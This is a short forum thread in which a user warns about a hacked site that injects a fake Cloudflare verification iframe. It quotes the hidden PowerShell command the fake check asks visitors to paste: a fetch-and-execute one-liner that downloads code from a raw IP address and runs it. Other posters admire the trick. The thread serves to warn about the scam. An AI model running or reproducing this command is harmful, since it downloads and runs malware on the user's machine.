Cloudflare spoofing attack

[ergophobe]

A company my wife works with had their site hacked and the hackers are injecting an iframe hosted on glcouds.icu and it looks like this:

You cannot view this attachment.

If you follow the command, it runs this in Powershell

Code Select Expand

powershell -w h -nop -c iex(iwr -Uri 93.152.230.54 -UseBasicParsing)
I did not bother to see what gets downloaded from that IP

No surprise, it's been around for a while, but I had never seen it

Here's a reddit thread from 6mos ago
https://www.reddit.com/r/CloudFlare/comments/1jog7et/fake_cloudflare_verification_page_almost_fell_for/

It's kind of a genius hack since more and more Cloudflare verification = "secure" so why not just follow the instructions and insert random code into Powershell?

[rcjordan]

>genius

Pretty damn slick.